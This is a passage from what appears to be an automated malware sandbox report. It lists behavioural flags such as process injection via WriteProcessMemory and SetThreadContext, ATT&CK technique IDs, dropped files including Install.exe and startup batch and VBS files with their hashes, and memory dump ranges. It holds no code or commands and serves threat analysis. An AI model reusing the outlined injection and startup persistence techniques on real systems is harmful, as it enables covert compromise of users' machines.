- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
ac3d19fbb5c5f10833f1882308f77548

SHA1
ac880466fd99a5719fedc7289b00d78ba7088e06

SHA256
3353b90af649198e084632af776f8c6ea3a9302da5a50d85f7ecde1c7ad295df

SHA512
b5e6369d7f475e9931d19fb2a5305b4c901ca5fcac5d788d064b6a1b1d6de2034e84932ac243d5056c745b924a2e9537a06b4172fab364402263788c814bc28b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
45KB

MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
17KB

MD5
c1b1c5a800a9dec100ce3508f3e3af5a

SHA1
62345155f048cfa6fb2d68152f0fda3b7e93db84

SHA256
dba5c1b09c6a80e0c39859fc55fae1b4e326cd64686cec32dc78640ba1d5172a

SHA512
de79029503f3046e04da264b1d6fb63c586690c256dd4df8d507f4a4349ff5c8ad0e65da0384b335e5cce44e14dc7b79cfc2003d97367091015d430b6d86e303

Download Submit
C:\Users\Admin\AppData\Local\Temp\7rivpDcXWOa4.bat

Filesize
276B

MD5
6469b876c13e9d644578a330a903f87b

SHA1
1dd0e9be8e031bd70ed549038bdd2d1b269f80cd

SHA256
b7a168c935d9bb9cee4952bfafafa379ffd693715de309832445e1c85102b723

SHA512
e06bd4262ef3e174ae7e3ebf4ac2d88e0b15bf50044a63b01a2d35521e20cf77db052abe25ac875788e166476764fab2e6fb98599403d93b78ea02a53a604d5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe

Filesize
163KB

MD5
051b3f7c30caf2eedbed29daa6192efb

SHA1
a3e0f31e4b4367e5af06f71e7718e7d64ceb250d

SHA256
6cd0c5b5b528c15ad28d9f8e44ee2b4e46d8942e8c0592e89c056a3a3661c3b3

SHA512
93288a5e145ebf48fb5b536cf331159dad81c1c0458099b5cfc649fddc9a5755739cab9d46c8a3f562dba1ed7ed4852c51eaebd73e9ea8ee28f053df22c74158

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0jm4h4m.k34.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$sxr-Logs\05-29-~1

Filesize
224B

MD5
21ad0385c40fe3da46612a7f41b750c7

SHA1
62e7ab15d8ac2c549401c9bb6bd8a64d0a6dd230

SHA256
5a89196675d291c51c96cf10118dc0206f76a38b23b806aee1447755b1f7660f

SHA512
bfa447f153a95980e6bb8f0022d6128309c4bbae700be946531275b9a401db4cd814374fad44c28539b8a607bb9c96bb6ca98036a77327710601eca7a536efcb

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_483.bat

Filesize
1003KB

MD5
d6d62f532591a7d034abac21eff0b57b

SHA1
94c28efce74a67eb18d28bd51f65d285c8d1caef

SHA256
070f7c800e8278b2cad111635cec3c501ff0aa9aa93fdd9529fcb8736a06d56d

SHA512
26f94770e0d250aa6e063af8d5422848a72753a72b20e62b33a76fef5453cdd9e1f70466a935ef0dec145af9b293e12a6ec0e9101f0bd8e80edd3f4be706294a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_483.vbs

Filesize
115B

MD5
7d7bdd102c0cb18fe09c62e38bc9c651

SHA1
72005e64cdea5ccf472c4c26899e67e68c6c4266

SHA256
23591be9bda6ecb5a3763a128661d09fbe0bbe1b51045ff9b085cc881aadfbb5

SHA512
cbb568f1d2bdee5b40052e9da0fb2e785f097e62b86d0804f6eb8eb230fd3058cc8057240e837443e9f491e5c5e8b2694ca9731884a2ef98272f9e3e0f4041dc

Download Submit
memory/788-47-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/788-64-0x0000000009640000-0x0000000009673000-memory.dmp

Filesize
204KB

Download
memory/788-73-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/788-72-0x0000000009A90000-0x0000000009B35000-memory.dmp

Filesize
660KB

Download
memory/788-67-0x0000000009620000-0x000000000963E000-memory.dmp

Filesize
120KB

Download
memory/788-66-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/788-65-0x0000000070990000-0x00000000709DB000-memory.dmp

Filesize
300KB

Download
memory/788-74-0x0000000009BE0000-0x0000000009C74000-memory.dmp

Filesize
592KB

Download
memory/788-167-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/788-159-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/788-45-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/788-46-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/792-312-0x00007FF870EC0000-0x00007FF87109B000-memory.dmp

Filesize
1.9MB

Download
memory/792-311-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/792-316-0x00007FF86EEF0000-0x00007FF86EF9E000-memory.dmp

Filesize
696KB

Download
memory/792-306-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/792-307-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/792-308-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/792-309-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/1984-31-0x000000000A740000-0x000000000ADB8000-memory.dmp

Filesize
6.5MB

Download
memory/1984-5-0x0000000007070000-0x0000000007698000-memory.dmp

Filesize
6.2MB

Download
memory/1984-34-0x0000000008FA0000-0x0000000009092000-memory.dmp

Filesize
968KB

Download
memory/1984-33-0x0000000008C90000-0x0000000008C98000-memory.dmp

Filesize
32KB

Download
memory/1984-32-0x0000000008CE0000-0x0000000008CFA000-memory.dmp

Filesize
104KB

Download
memory/1984-2-0x0000000073DBE000-0x0000000073DBF000-memory.dmp

Filesize
4KB

Download
memory/1984-26-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/1984-3-0x0000000004420000-0x0000000004456000-memory.dmp

Filesize
216KB

Download
memory/1984-35-0x000000000CDC0000-0x000000000D2BE000-memory.dmp

Filesize
5.0MB

Download
memory/1984-15-0x0000000007F20000-0x0000000007F96000-memory.dmp

Filesize
472KB

Download
memory/1984-228-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/1984-8-0x0000000007000000-0x0000000007066000-memory.dmp

Filesize
408KB

Download
memory/1984-9-0x00000000077A0000-0x0000000007806000-memory.dmp

Filesize
408KB

Download
memory/1984-6-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/1984-10-0x0000000007810000-0x0000000007B60000-memory.dmp

Filesize
3.3MB

Download
memory/1984-4-0x0000000073DB0000-0x000000007449E000-memory.dmp

Filesize
6.9MB

Download
memory/1984-7-0x0000000006E80000-0x0000000006EA2000-memory.dmp

Filesize
136KB

Download
memory/1984-13-0x0000000007C20000-0x0000000007C3C000-memory.dmp

Filesize
112KB

Download
memory/1984-14-0x0000000008160000-0x00000000081AB000-memory.dmp

Filesize
300KB

Download
memory/2524-305-0x00007FF86EEF0000-0x00007FF86EF9E000-memory.dmp

Filesize
696KB

Download
memory/2524-304-0x00007FF870EC0000-0x00007FF87109B000-memory.dmp

Filesize
1.9MB

Download
memory/2524-303-0x0000029FBE150000-0x0000029FBE17A000-memory.dmp

Filesize
168KB

Download
memory/2524-260-0x0000029FBE410000-0x0000029FBE486000-memory.dmp

Filesize
472KB

Download
memory/2524-240-0x0000029FBE0E0000-0x0000029FBE102000-memory.dmp

Filesize
136KB

Download
memory/2592-205-0x000000000A660000-0x000000000A6CC000-memory.dmp

Filesize
432KB

Download
memory/2592-298-0x000000000A4A0000-0x000000000A4AA000-memory.dmp

Filesize
40KB

Download
memory/2592-261-0x0000000009300000-0x000000000933E000-memory.dmp

Filesize
248KB

Download
memory/2592-239-0x0000000006CE0000-0x0000000006CF2000-memory.dmp

Filesize
72KB

Download
memory/2592-206-0x000000000A820000-0x000000000A8B2000-memory.dmp

Filesize
584KB

Download
memory/5016-249-0x0000000008DA0000-0x0000000008DDC000-memory.dmp

Filesize
240KB

Download